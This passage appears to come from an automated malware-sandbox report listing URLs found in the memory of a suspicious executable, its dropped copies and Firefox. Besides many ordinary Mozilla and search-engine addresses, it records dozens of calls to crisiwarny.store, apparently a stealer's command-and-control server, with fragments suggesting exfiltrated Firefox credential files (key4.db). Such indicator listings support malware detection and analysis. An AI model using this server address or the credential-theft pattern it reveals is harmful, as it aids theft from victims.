Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180use
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2801742909.0000000005A99000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.s
Source: e192e43b61.exe, 0000000D.00000003.2806047135.000000000111B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/(
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/.B64
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store//
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2936438339.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/1
Source: file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/?
Source: e192e43b61.exe, 0000000B.00000003.2824415712.000000000145E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824195548.000000000145B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/A
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/B
Source: e192e43b61.exe, 0000000B.00000003.2883813497.000000000145F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/G
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/HEFM
Source: e192e43b61.exe, 0000000A.00000003.2606262886.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608822442.0000000001193000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/I
Source: e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/P
Source: e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/PW
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/R
Source: e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/T
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/Y
Source: e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiF9
Source: e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiP
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiS
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apiT
Source: file.exe, 00000000.00000003.1732244600.0000000001756000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2843716285.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883708790.000000000146A000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.0000000001135000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibu
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibuE
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apibue
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apig
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apig9x
Source: file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apipd
Source: file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apire1
Source: file.exe, 00000000.00000003.1872949607.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004445181.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804018008.0000000001782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apis
Source: file.exe, 00000000.00000003.1800032678.0000000001782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apis9x
Source: e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apit
Source: file.exe, 00000000.00000003.1804018008.000000000177C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1799770952.000000000177C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/e-
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/em
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/hi39
Source: e192e43b61.exe, 0000000D.00000003.2792073053.000000000111B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/i
Source: e192e43b61.exe, 0000000B.00000003.2755425004.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/lB
Source: e192e43b61.exe, 0000000D.00000003.2908880792.0000000001123000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/r
Source: e192e43b61.exe, 0000000D.00000003.2883370297.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/rdVPr
Source: file.exe, 00000000.00000003.1873047117.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2004277314.000000000177B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.000000000177B000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2898981302.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/s
Source: e192e43b61.exe, 0000000A.00000003.2658045895.0000000001190000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2639716464.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2678842277.000000000118F000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640641696.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/y
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api2o4p.default-release/key4.dbPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api=
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiF
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apin.txtPK
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/apiw
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsTim
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001D.00000003.2861629695.000001E762700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869871266.000001E76297B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3011870817.000037E83F604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3012022176.000037F743104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000003.2875621731.000001E760333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2880032566.000001E760331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2879615438.000001E760314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
